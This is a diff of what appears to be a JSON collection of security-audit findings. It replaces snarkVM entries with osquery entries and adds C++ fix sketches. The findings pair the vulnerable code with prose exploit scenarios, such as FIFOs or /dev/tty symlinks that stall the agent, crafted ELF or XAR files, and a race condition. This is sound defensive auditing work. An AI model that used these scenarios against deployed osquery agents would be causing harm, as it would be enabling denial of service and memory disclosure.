); ensure!(! self .instructions.is_empty(), \"Cannot add outputs before instructions have been added\" ); // Ensure the maximum number of outputs has not been exceeded. ensure!( self .outputs.len() <= N::MAX_OUTPUTS , \"Cannot add more than {} outputs\" , N::MAX_OUTPUTS); // Insert the output statement. self .outputs.insert(output); Ok (()) } Figure 21.1: vm/compiler/src/program/function/mod.rs#L142-L153 Figure 21.2 shows another issue present only in the add_output functions (for both Function and Closure types): When an output instruction is inserted into the set, no check validates if this particular element is already in the set, replacing the previous element with the same key if present.
{ - "title": "21. Instruction add_* methods incorrectly compare maximum number of allowed instructions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "During function and closure parsing, the compiler collects input, regular, and output instructions into three different IndexSets in the add_input, add_instruction, and add_output functions. All of these functions check that the current number of elements in their respective IndexSet does not exceed the maximum allowed number. However, the check is done before inserting the element in the set, allowing insertion into a set that is already at full capacity and creating a set with one element more than the maximum. Figure 21.1 shows the comparison between the current and the maximum number of allowed elements and the subsequent insertion, which is allowed even though the set could already be at full capacity. All add_input, add_instruction, and add_output functions for both the Function and Closure types present similar behavior. Note that although the number of input and output instructions is checked in other locations (e.g., in the add_closure or get_closure functions), the number of regular instructions is not checked there, allowing a function or a closure with 1 + N::MAX_INSTRUCTIONS. fn add_output(&mut self, output: Output) -> Result<()> { // Ensure there are input statements and instructions in memory. ensure!(!self.inputs.is_empty(), \"Cannot add outputs before inputs have been added\"); ensure!(!self.instructions.is_empty(), \"Cannot add outputs before instructions have been added\"); // Ensure the maximum number of outputs has not been exceeded. ensure!(self.outputs.len() <= N::MAX_OUTPUTS, \"Cannot add more than {} outputs\", N::MAX_OUTPUTS); // Insert the output statement. self.outputs.insert(output); Ok(()) } Figure 21.1: vm/compiler/src/program/function/mod.rs#L142-L153 Figure 21.1 shows another issue present only in the add_output functions (for both Function and Closure types): when an output instruction is inserted into the set, no check validates whether this particular element is already in the set, so a previous element with the same key is silently replaced if present. This causes two output statements to be interpreted as a single one: program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; output r2 as i8; function compute: input r0 as i8.private; input r1 as u8.public; call clo r0 r1 into r2; output r2 as i8.private; Figure 21.2: Test program Recommendations Short term, we recommend the following actions: Modify the checks to validate the maximum number of allowed instructions to prevent the off-by-one error. Validate whether outputs are already present in the Function and Closure sets before inserting an output. Add checks to validate the maximum number of instructions in the get_closure, get_function, add_closure, and add_function functions.", + "title": "8. The parsePlist function can hang on reading certain files ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The osquery codebase contains a function called osquery::parsePlist, which reads and parses .plist files. This function opens the target file directly by using the inputStreamWithFileAtPath method from NSInputStream, as shown in figure 7.1 in the previous finding, and passes the resulting input stream to NSPropertyListSerialization for direct consumption. However, parsePlist can hang on reading certain files. For example, if the file to be read is a FIFO, the function blocks the osquery thread until another program or thread opens the FIFO to write to it. Exploit Scenario An attacker creates a FIFO file on a macOS device in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist or ~/Library/Logs/DiagnosticReports/XProtect-foo using the mkfifo command. The osquery agent attempts to open and read the file when building a response for queries on the browser_plugins and xprotect_reports tables, but parsePlist blocks the osquery thread indefinitely, leaving osquery unable to respond to the query request. Recommendations Short term, implement a check in parsePlist to verify that the .plist file to be read is not a special file (a sketch follows this entry). Long term, introduce a timeout on file operations so that a block does not stall the osquery thread. Also consider replacing parsePlist in favor of the parsePlistContent function and standardizing all file reads on a single code path to prevent similar issues going forward. 9. The parseJSON function can hang on reading certain files on Linux and macOS Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-ATL-9 Target: osquery/filesystem/filesystem.cpp", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] },
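A minimal sketch of that special-file check, assuming POSIX only; isRegularFile is a hypothetical helper name.

    #include <sys/stat.h>
    #include <string>

    // Sketch only: refuse to parse anything that is not a regular file, so a
    // FIFO planted at an Info.plist path cannot block the thread.
    bool isRegularFile(const std::string& path) {
      struct stat st = {};
      if (lstat(path.c_str(), &st) != 0) { // lstat also rejects symlinks
        return false;
      }
      return S_ISREG(st.st_mode);
    }

Note the residual TOCTOU window between this check and the subsequent open; a stricter variant opens the file with O_NONBLOCK and checks fstat on the resulting descriptor instead (compare finding 13).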
{ - "title": "22. Instances of unchecked zip_eq can cause runtime errors ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The zip_eq operator requires that both iterators being zipped have the same length, and panics if they do not. In addition to the cases presented in TOB-ALEOA-5, we found one more instance where this should be checked: // Retrieve the interface and ensure it is defined in the program. let interface = stack.program().get_interface(&interface_name)?; // Initialize the interface members. let mut members = IndexMap::new(); for (member, (member_name, member_type)) in inputs.iter().zip_eq(interface.members()) { Figure 22.1: compiler/src/program/instruction/operation/cast.rs#L92-L99 Additionally, we found uses of the zip operator that should be replaced by zip_eq, together with an associated check to validate the equal length of their iterators: /// Checks that the given operands matches the layout of the interface. The ordering of the operands matters. pub fn matches_interface(&self, stack: &Stack, operands: &[Operand], interface: &Interface) -> Result<()> { // Ensure the operands is not empty. if operands.is_empty() { bail!(\"Casting to an interface requires at least one operand\") } // Ensure the operand types match the interface. for (operand, (_, member_type)) in operands.iter().zip(interface.members()) { Figure 22.2: vm/compiler/src/process/register_types/matches.rs#L20-L27 for (operand, (_, entry_type)) in operands.iter().skip(2).zip(record_type.entries()) { Figure 22.3: vm/compiler/src/process/register_types/matches.rs#L106-L107 Exploit Scenario An incorrectly typed program causes the compiler to panic due to a mismatch between the number of arguments in a cast and the number of elements in the cast type. Recommendations Short term, add checks to validate the equal length of the iterators being zipped and replace the uses of zip with zip_eq together with the associated length validations.", + "title": "10. No limit on the amount of data read or expanded from the Safari extensions table ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The safari_extensions table allows the agent to query installed Safari extensions on a certain user profile. Said extensions consist of extensible archive format (XAR) compressed archives with the .safariextz file extension, which are stored in the ~/Library/Safari/Extensions folder. The osquery program does not have a limit on the amount of data that can be processed when reading and inflating the Safari extension contents; a large amount of data may cause a denial of service. xar_t xar = xar_open(path.c_str(), READ); if (xar == nullptr) { TLOG << \"Cannot open extension archive: \" << path; return; } xar_iter_t iter = xar_iter_new(); xar_file_t xfile = xar_file_first(xar, iter); size_t max_files = 500; for (size_t index = 0; index < max_files; ++index) { if (xfile == nullptr) { break; } char* xfile_path = xar_get_path(xfile); if (xfile_path == nullptr) { break; } // Clean up the allocated content ASAP. std::string entry_path(xfile_path); free(xfile_path); if (entry_path.find(\"Info.plist\") != std::string::npos) { if (xar_verify(xar, xfile) != XAR_STREAM_OK) { TLOG << \"Extension info extraction failed verification: \" << path; } size_t size = 0; char* buffer = nullptr; if (xar_extract_tobuffersz(xar, xfile, &buffer, &size) != 0 || size == 0) { break; } std::string content(buffer, size); free(buffer); pt::ptree tree; if (parsePlistContent(content, tree).ok()) { for (const auto& it : kSafariExtensionKeys) { r[it.second] = tree.get(it.first, \"\"); } } break; } xfile = xar_file_next(iter); } Figure 10.1: genSafariExtension extracts the full Info.plist to memory. Exploit Scenario An attacker crafts a valid extension containing a large Info.plist file and stores it in ~/Library/Safari/Extensions/foo.safariextz.
When the osquery agent attempts to respond to a query on the safari_extensions table, it opens the archive and expands the full Info.plist file in memory, causing high resource consumption. Recommendations Short term, enforce a limit on the amount of information that can be extracted from an XAR archive (a sketch follows this entry). Long term, add guidelines to the development documentation on handling untrusted input data. For instance, advise developers to limit the amount of data that may be ingested, processed, or read from untrusted sources such as user-writable files. Enforce said guidelines by performing code reviews on new contributions.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] },
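One illustrative way to enforce such a limit is to check the size the archive's table of contents declares for an entry before inflating it. This is a sketch under assumptions: it presumes libxar's xar_prop_get exposes the declared size under the "data/size" key, and kMaxExtensionPlistSize is a hypothetical constant; verify both against xar.h and the TOC format before relying on this.

    #include <xar/xar.h>
    #include <cstdlib>

    const size_t kMaxExtensionPlistSize = 1 * 1024 * 1024; // illustrative 1 MB cap

    // Sketch only: reject an entry whose declared size exceeds the cap, so
    // xar_extract_tobuffersz is never asked to materialize it in memory.
    bool declaredSizeWithinLimit(xar_file_t xfile) {
      const char* value = nullptr;
      // Assumption: "data/size" is the TOC property holding the entry size.
      if (xar_prop_get(xfile, "data/size", &value) != 0 || value == nullptr) {
        return false; // No declared size: treat the entry as untrusted and skip it.
      }
      size_t declared = std::strtoull(value, nullptr, 10);
      return declared <= kMaxExtensionPlistSize;
    }

Even with this pre-check, the extracted size returned by xar_extract_tobuffersz should still be validated, since the TOC itself is attacker-controlled.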
{ - "title": "23. Hash functions lack domain separation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The BHP hash function takes as input a collection of booleans, and hashes them. This hash is used to commit to a Record, hashing together the bits of program_id, the record_name, and the record itself. However, no domain separation or input length is added to the hash, allowing a hash collision if a type's to_bits_le function returns variable-length arrays: impl Record> { /// Returns the record commitment. pub fn to_commitment(&self, program_id: &ProgramID, record_name: &Identifier) -> Result > { // Construct the input as `(program_id || record_name || record)`. let mut input = program_id.to_bits_le(); input.extend(record_name.to_bits_le()); input.extend(self.to_bits_le()); // Compute the BHP hash of the program record. N::hash_bhp1024(&input) } } Figure 23.1: console/program/src/data/record/to_commitment.rs#L19-L29 A similar situation is present in the hash_children function, which is used to compute hashes of two nodes in a Merkle tree: impl PathHash for BHP { type Hash = Field; /// Returns the hash of the given child nodes. fn hash_children(&self, left: &Self::Hash, right: &Self::Hash) -> Result<Self::Hash> { // Prepend the nodes with a `true` bit. let mut input = vec![true]; input.extend(left.to_bits_le()); input.extend(right.to_bits_le()); // Hash the input. Hash::hash(self, &input) } } Figure 23.2: circuit/collections/src/merkle_tree/helpers/path_hash.rs#L33-L47 If the implementations of the to_bits_le functions return variable-length arrays, it would be easy to create two different inputs that would result in the same hash. Recommendations Short term, either enforce each type's to_bits_le function to always return fixed-length output or add the input length and domain separators to the elements to be hashed by the BHP hash function. This would prevent the hash collisions even if the to_bits_le functions were changed in the future.", + "title": "11. Extended attributes table may read uninitialized or out-of-bounds memory ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The extended_attributes table calls the listxattr function twice: first to query the extended attribute list size and then to actually retrieve the list of attribute names. Additionally, the return values from the function calls are not checked for errors. This leads to a race condition in the parseExtendedAttributeList osquery function, in which the content buffer is left uninitialized if the target file is deleted in the time between the two listxattr calls. As a result, std::string will consume uninitialized and unbounded memory, potentially leading to out-of-bounds memory reads. std::vector<std::string> attributes; ssize_t value = listxattr(path.c_str(), nullptr, (size_t)0, 0); char* content = (char*)malloc(value); if (content == nullptr) { return attributes; } ssize_t ret = listxattr(path.c_str(), content, value, 0); if (ret == 0) { free(content); return attributes; } char* stable = content; do { attributes.push_back(std::string(content)); content += attributes.back().size() + 1; } while (content - stable < value); free(stable); return attributes; Figure 11.1: parseExtendedAttributeList calls listxattr twice. Exploit Scenario An attacker creates and runs a program to race osquery while it is fetching extended attributes from the file system. The attacker is successful and causes the osquery agent to crash with a segmentation fault. Recommendations Short term, rewrite the affected code to check the return values for errors. Replace listxattr with flistxattr, which operates on opened file descriptors, allowing it to continue to query extended attributes even if the file is removed (unlink-ed) from the file system (a sketch follows this entry). Long term, establish and enforce best practices for osquery contributions by leveraging automated tooling and code reviews to prevent similar issues from reoccurring. For example, use file descriptors instead of file paths when you need to perform more than one operation on a file to ensure that the file is not deleted or replaced mid-operation. Consider using static analysis tools such as CodeQL to look for other instances of similar issues in the code and to detect new instances of the problem on new contributions.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4502,39 +7190,29 @@ ] },
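A minimal sketch of the flistxattr-based rewrite (macOS signatures), with every return value checked; listAttributes is a hypothetical helper name standing in for parseExtendedAttributeList.

    #include <sys/xattr.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <string>
    #include <vector>

    // Sketch only: query extended attributes through a file descriptor so the
    // target cannot be swapped out between the size query and the content read.
    std::vector<std::string> listAttributes(const std::string& path) {
      std::vector<std::string> attributes;
      int fd = open(path.c_str(), O_RDONLY | O_NONBLOCK);
      if (fd < 0) {
        return attributes;
      }
      ssize_t size = flistxattr(fd, nullptr, 0, 0);
      if (size > 0) {
        std::vector<char> content(static_cast<size_t>(size));
        ssize_t ret = flistxattr(fd, content.data(), content.size(), 0);
        if (ret > 0) { // a failed or shrunk result means the list changed: bail out
          for (ssize_t off = 0; off < ret;) {
            std::string name(content.data() + off); // names are NUL-separated
            off += static_cast<ssize_t>(name.size()) + 1;
            attributes.push_back(std::move(name));
          }
        }
      }
      close(fd);
      return attributes;
    }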
{ - "title": "24. Deployment constructor does not enforce the network edition value ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Deployment type includes the edition value, which should match the network edition value. However, this is not enforced in the deployment constructor as it is in the Execution constructor. impl Deployment { /// Initializes a new deployment. pub fn new(edition: u16, program: Program, verifying_keys: IndexMap , (VerifyingKey, Certificate)>,) -> Result<Self> { Ok(Self { edition, program, verifying_keys }) } } Figure 24.1: vm/compiler/src/process/deployment/mod.rs#L37-L44 Recommendations Short term, consider using the N::EDITION value in the Deployment constructor, similarly to the Execution constructor.", - "labels": [ - "Trail of Bits", - "Severity: Informational", - "Difficulty: Informational" - ] - }, - { - "title": "25. Map insertion return value is ignored ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "Some insertions into hashmap data types ignore whether the insertion overwrote an element already present in the hash map. For example, when handling the proving and verifying key index maps, the Option return value from the insert function is ignored: #[inline] pub fn insert_proving_key(&mut self, function_name: &Identifier, proving_key: ProvingKey) { self.proving_keys.write().insert(*function_name, proving_key); } /// Inserts the given verifying key for the given function name. #[inline] pub fn insert_verifying_key(&mut self, function_name: &Identifier, verifying_key: VerifyingKey) { self.verifying_keys.write().insert(*function_name, verifying_key); } Figure 25.1: vm/compiler/src/process/stack/mod.rs#L336-L346 Other examples of ignored insertion return values are present in the codebase and can be found using the regular expression \\.insert.*\\); . Recommendations Short term, investigate if any of the unguarded map insertions should be checked.", + "title": "12. The readFile function can hang on reading a file ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The readFile function is used to provide a standardized way to read files. It uses the read_max variable to prevent the function from reading excessive amounts of data. It also selects one of two modes, blocking or non-blocking, depending on the file properties. When using the blocking approach, it reads block_size-sized chunks of the file, with a minimum of 4,096 bytes, and returns the chunks to the caller. However, the call to read can block the osquery thread when reading certain files. if (handle.blocking_io) { // Reset block size to a sane minimum. block_size = (block_size < 4096) ? 4096 : block_size; ssize_t part_bytes = 0; bool overflow = false; do { std::string part(block_size, '\\0'); part_bytes = handle.fd->read(&part[0], block_size); if (part_bytes > 0) { total_bytes += static_cast<size_t>(part_bytes); if (total_bytes >= read_max) { return Status::failure(\"File exceeds read limits\"); } if (file_size > 0 && total_bytes > file_size) { overflow = true; part_bytes -= (total_bytes - file_size); } predicate(part, part_bytes); } } while (part_bytes > 0 && !overflow); } else { Figure 12.1: The blocking_io flow can stall. Exploit Scenario An attacker creates a symlink to /dev/tty in a path known to be read by the osquery agent. When the osquery agent attempts to read the file, it stalls. Recommendations Short term, ensure that the file operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on file operations so that a block does not stall the osquery thread (a sketch follows this entry).", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Informational" + "Severity: Medium", + "Difficulty: Low" ] },
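One way such a timeout could look, as a sketch only: bound how long a read may block by polling the descriptor first. readWithTimeout is a hypothetical helper; a real fix would live inside PlatformFile::read.

    #include <poll.h>
    #include <unistd.h>

    // Sketch only: returns the bytes read, 0 on EOF, or -1 on error/timeout.
    ssize_t readWithTimeout(int fd, void* buf, size_t count, int timeout_ms) {
      struct pollfd pfd = {fd, POLLIN, 0};
      int ready = poll(&pfd, 1, timeout_ms);
      if (ready <= 0) {
        return -1; // timed out (0) or poll failed (-1): do not block on read()
      }
      return read(fd, buf, count);
    }

Regular files always poll as readable, so this only changes behavior for the special files (TTYs, FIFOs) that cause the stall.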
{ - "title": "26. Potential truncation on reading and writing Programs, Deployments, and Executions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "When writing a Program to bytes, the number of import statements and identifiers are cast to a u8 integer, leading to the truncation of elements if there are more than 256 identifiers: // Write the number of program imports. (self.imports.len() as u8).write_le(&mut writer)?; // Write the program imports. for import in self.imports.values() { import.write_le(&mut writer)?; } // Write the number of components. (self.identifiers.len() as u8).write_le(&mut writer)?; Figure 26.1: vm/compiler/src/program/bytes.rs#L73-L81 During Program parsing, this limit of 256 identifiers is never enforced. Similarly, the Execution and Deployment write_le functions assume that there are fewer than u16::MAX transitions and verifying keys, respectively. // Write the number of transitions. (self.transitions.len() as u16).write_le(&mut writer)?; Figure 26.2: vm/compiler/src/process/execution/bytes.rs#L52-L53 // Write the number of entries in the bundle. (self.verifying_keys.len() as u16).write_le(&mut writer)?; Figure 26.3: vm/compiler/src/process/deployment/bytes.rs#L62-L63 Recommendations Short term, determine a maximum number of allowed import statements and identifiers and enforce this bound on Program parsing. Then, guarantee that the integer type used in the write_le function includes this bound. Perform the same analysis for the Execution and Deployment functions.", + "title": "13. The POSIX PlatformFile constructor may block the osquery thread ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The POSIX implementation of PlatformFile's constructor uses the open syscall to obtain a handle to the file. If the file to be opened is a FIFO, the call to open blocks the osquery thread unless the O_NONBLOCK flag is used. There are several places in the codebase in which the constructor is called without the PF_NONBLOCK flag set; all of these calls may stall on opening a FIFO. PlatformFile::PlatformFile(const fs::path& path, int mode, int perms) : fname_(path) { ... if ((mode & PF_NONBLOCK) == PF_NONBLOCK) { oflag |= O_NONBLOCK; is_nonblock_ = true; } if ((mode & PF_APPEND) == PF_APPEND) { oflag |= O_APPEND; } if (perms == -1 && may_create) { perms = 0666; } boost::system::error_code ec; if (check_existence && (!fs::exists(fname_, ec) || ec.value() != errc::success)) { handle_ = kInvalidHandle; } else { handle_ = ::open(fname_.c_str(), oflag, perms); } } Figure 13.1: The POSIX PlatformFile constructor ./filesystem/file_compression.cpp:26: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:32: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:102: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:108: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:177: PlatformFile pFile(f, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:242: PlatformFile fd(path, PF_OPEN_EXISTING | PF_WRITE); ./filesystem/filesystem.cpp:258: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:531: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./carver/carver.cpp:230: PlatformFile src(srcPath, PF_OPEN_EXISTING | PF_READ); Figure 13.2: Uses of PlatformFile without PF_NONBLOCK Exploit Scenario An attacker creates a FIFO file that is opened by one of the functions above, stalling the osquery agent. Recommendations Short term, investigate the uses of PlatformFile to identify possible blocks (a sketch follows this entry). Long term, use a static analysis tool such as CodeQL to scan the code for instances in which uses of the open syscall block the osquery thread. 14. No limit on the amount of data the Carver::blockwiseCopy method can write Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-ATL-14 Target: osquery/carver/carver.cpp", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Low" ] },
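An illustrative sketch of a stall-proof open, under the assumption that the callers in figure 13.2 only ever need regular files; openWithoutStalling is a hypothetical helper name.

    #include <fcntl.h>
    #include <sys/stat.h>
    #include <unistd.h>

    // Sketch only: open with O_NONBLOCK so a FIFO cannot stall the constructor,
    // then restore blocking semantics once the descriptor is known to be safe.
    int openWithoutStalling(const char* path, int oflag, int perms) {
      int fd = open(path, oflag | O_NONBLOCK, perms);
      if (fd < 0) {
        return fd;
      }
      struct stat st = {};
      if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd); // FIFO, device, or unexpected type: refuse the handle
        return -1;
      }
      // Safe to clear O_NONBLOCK now that the file is known to be regular.
      fcntl(fd, F_SETFL, fcntl(fd, F_GETFL) & ~O_NONBLOCK);
      return fd;
    }

Checking fstat on the already-open descriptor (rather than stat on the path) avoids the TOCTOU race noted under finding 8.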
{ - "title": "27. StatePath::verify accepts invalid states ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The StatePath::verify function attempts to validate several properties in the transaction using the code shown in figure 27.1. However, this code does not actually check that all checks are true; it checks only that there are an even number of false booleans. Since there are six booleans in the operation, the function will return true if all are false. // Ensure the block path is valid. let check_block_hash = A::hash_bhp1024(&block_hash_preimage).is_equal(&self.block_hash); // Ensure the state root is correct. let check_state_root = A::verify_merkle_path_bhp(&self.block_path, &self.state_root, &self.block_hash.to_bits_le()); check_transition_path.is_equal(&check_transaction_path).is_equal(&check_transactions_path).is_equal(&check_header_path).is_equal(&check_block_hash).is_equal(&check_state_root) } Figure 27.1: vm/compiler/src/ledger/state_path/circuit/verify.rs#L57-L70 We marked the severity as informational since the function is still not being used. Exploit Scenario An attacker submits a StatePath where no checks hold, but the verify function still returns true. Recommendations Short term, ensure that all checks are true (e.g., by taking the conjunction of all booleans and checking that the resulting boolean is true).", + "title": "15. The carves table truncates large file sizes to 32 bits ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The enumerateCarves function uses rapidjson::Value::GetInt() to retrieve a size value from a JSON string. The GetInt return type is int, so it cannot represent sizes exceeding 32 bits; as a result, the size of larger files will be truncated. void enumerateCarves(QueryData& results, const std::string& new_guid) { std::vector carves; scanDatabaseKeys(kCarves, carves, kCarverDBPrefix); for (const auto& carveGuid : carves) { std::string carve; auto s = getDatabaseValue(kCarves, carveGuid, carve); if (!s.ok()) { VLOG(1) << \"Failed to retrieve carve GUID\"; continue; } JSON tree; s = tree.fromString(carve); if (!s.ok() || !tree.doc().IsObject()) { VLOG(1) << \"Failed to parse carve entries: \" << s.getMessage(); return; } Row r; if (tree.doc().HasMember(\"time\")) { r[\"time\"] = INTEGER(tree.doc()[\"time\"].GetUint64()); } if (tree.doc().HasMember(\"size\")) { r[\"size\"] = INTEGER(tree.doc()[\"size\"].GetInt()); } stringToRow(\"sha256\", r, tree); stringToRow(\"carve_guid\", r, tree); stringToRow(\"request_id\", r, tree); stringToRow(\"status\", r, tree); stringToRow(\"path\", r, tree); // This table can be used to request a new carve. // If this is the case then return this single result. auto new_request = (!new_guid.empty() && new_guid == r[\"carve_guid\"]); r[\"carve\"] = INTEGER((new_request) ? 1 : 0); results.push_back(r); } } } // namespace Figure 15.1: The enumerateCarves function truncates files of large sizes. Exploit Scenario An attacker creates a file on disk of a size that overflows 32 bits by only a small amount, such as 0x100001336. The carves table reports the file size incorrectly as 0x1336 bytes. The attacker bypasses checks based on the reported file size. Recommendations Short term, use GetUint64 instead of GetInt to retrieve the file size.
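As a sketch of that one-line fix against the snippet in figure 15.1, guarding the JSON type first; BIGINT is assumed to be osquery's 64-bit row macro (INTEGER is used for 32-bit values above), so confirm the macro name before applying.

    // Sketch only: read the carve size as an unchecked 64-bit value.
    if (tree.doc().HasMember("size") && tree.doc()["size"].IsUint64()) {
      r["size"] = BIGINT(tree.doc()["size"].GetUint64());
    }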
Long term, use static analysis tools such as CodeQL to look for other instances in which a type of size int is retrieved from JSON and stored in an INTEGER field.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4542,9 +7220,9 @@ ] }, { - "title": "28. Potential panic in encryption/decryption circuit generation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The decrypt_with_randomizers and encrypt_with_randomizers functions do not check the length of the randomizers argument against the length of the underlying ciphertext and plaintext, respectively. This can cause a panic in the zip_eq call. Existing calls to the function seem safe, but since it is a public function, the lengths of its underlying values should be checked to prevent panics in future code. pub(crate) fn decrypt_with_randomizers(&self, randomizers: &[Field]) -> Plaintext { // Decrypt the ciphertext. Plaintext::from_fields(&self.iter().zip_eq(randomizers) Figure 28.1: circuit/program/src/data/ciphertext/decrypt.rs#L31-L36 Recommendations Short term, add a check to ensure that the length of the underlying plaintext/ciphertext matches the length of the randomizer values.", + "title": "16. The time table may not null-terminate strings correctly ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The osquery time table uses strftime to format time information, such as the time zone name, into user-friendly strings. If the amount of information to be written does not fit in the provided buffer, strftime returns zero and leaves the buffer contents in an undefined state. QueryData genTime(QueryContext& context) { Row r; time_t osquery_time = getUnixTime(); struct tm gmt; gmtime_r(&osquery_time, &gmt); struct tm now = gmt; auto osquery_timestamp = toAsciiTime(&now); char local_timezone[5] = {0}; { struct tm local; localtime_r(&osquery_time, &local); strftime(local_timezone, sizeof(local_timezone), \"%Z\", &local); } char weekday[10] = {0}; strftime(weekday, sizeof(weekday), \"%A\", &now); char timezone[5] = {0}; strftime(timezone, sizeof(timezone), \"%Z\", &now); Figure 16.1: genTime uses strftime to get the time zone name and day of the week. The strings to be written vary depending on the locale configuration, so some strings may not fit in the provided buffer. The code does not check the return value of strftime and assumes that the string buffer is always null-terminated, which may not always be the case. Exploit Scenario An attacker finds a way to change the time zone on a system in which %Z shows the full time zone name. When the osquery agent attempts to respond to a query on the time table, it triggers undefined behavior. Recommendations Short term, add a check to verify the return value of each strftime call made by the table implementation (a sketch follows this entry). If the function returns zero, ensure that the system writes a valid string in the buffer before it is used as part of the table response. Long term, perform code reviews on new contributions and consider using automated code analysis tools to prevent these kinds of issues from reoccurring.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4552,19 +7230,19 @@ ] },
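A minimal sketch of a checked wrapper around strftime; formatTime is a hypothetical helper name, and the 64-byte buffer is an illustrative choice.

    #include <ctime>
    #include <string>

    // Sketch only: a zero return yields a safe empty string rather than an
    // undefined buffer.
    std::string formatTime(const char* fmt, const struct tm* t) {
      char buf[64] = {0}; // generous buffer; "%Z" names can exceed 4 characters
      size_t written = strftime(buf, sizeof(buf), fmt, t);
      if (written == 0) {
        return std::string(); // did not fit or failed: return a valid empty value
      }
      return std::string(buf, written);
    }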
{ - "title": "29. Variable timing of certain cryptographic functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Pedersen commitment code computes the masking element [r]h by filtering out powers of h not indicated by the randomizer r and adding the remaining values. However, the timing of this function leaks information about the randomizer value. In particular, it can reveal the Hamming weight (or approximate Hamming weight) of the randomizer. If the randomizer r is a 256-bit value, but timing indicates that the randomizer has a Hamming weight of 100 (for instance), then the possible set of randomizers has only about 2^243 elements. This compromises the information-theoretic security of the hiding property of the Pedersen commitment. randomizer.to_bits_le().iter().zip_eq(&*self.random_base_window).filter(|(bit, _)| **bit).for_each(|(_, base)| { output += base; },); Figure 29.1: console/algorithms/src/pedersen/commit_uncompressed.rs#L27-L33 Recommendations Short term, consider switching to a constant-time algorithm for computing the masking value.", + "title": "17. The elf_info table can crash the osquery agent ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The elf_info table uses the libelfin library to read properties of ELF files. The library maps the entire ELF binary into virtual memory and then uses memory accesses to read the data. Specifically, the load method of the mmap_loader class returns a pointer to the data for a given offset and size. To ensure that the memory access stays within the bounds of the memory-mapped file, the library checks that the result of adding the offset and the size is less than the size of the file. However, this check does not account for the possibility of overflows in the addition operation. For example, an offset of 0xffffffffffffffff and a size of 1 would overflow to the value 0. This makes it possible to bypass the check and to create references to memory outside of the bounds. The elf_info table indirectly uses this function when loading section headers from an ELF binary. class mmap_loader : public loader { public: void *base; size_t lim; mmap_loader(int fd) { off_t end = lseek(fd, 0, SEEK_END); if (end == (off_t)-1) throw system_error(errno, system_category(), \"finding file length\"); lim = end; base = mmap(nullptr, lim, PROT_READ, MAP_SHARED, fd, 0); if (base == MAP_FAILED) throw system_error(errno, system_category(), \"mmap'ing file\"); close(fd); } ... const void *load(off_t offset, size_t size) { if (offset + size > lim) throw range_error(\"offset exceeds file size\"); return (const char*)base + offset; } }; Figure 17.1: The libelfin library's limit check does not account for overflows. Exploit Scenario An attacker knows of a writable path in which osquery scans ELF binaries. He creates a malformed ELF binary, causing the pointer returned by the vulnerable function to point to an arbitrary location. He uses this to make the osquery agent crash, leak information from the process memory, or circumvent address space layout randomization (ASLR). Recommendations Short term, work with the developers of the libelfin project to account for overflows in the check (see the sketch below). Long term, implement the recommendations in TOB-ATL-2 to minimize the impact of similar issues.
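An overflow-safe version of that bounds check, sketched with unsigned offsets for clarity (the libelfin original takes off_t, so a real patch would also reject negative offsets): instead of testing offset + size, which can wrap, bound each operand separately.

    #include <cstddef>
    #include <stdexcept>

    // Sketch only: neither comparison below can overflow, because the
    // subtraction lim - offset only happens once offset <= lim is known.
    const void* load(const char* base, size_t lim, size_t offset, size_t size) {
      if (offset > lim || size > lim - offset) {
        throw std::range_error("offset exceeds file size");
      }
      return base + offset;
    }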
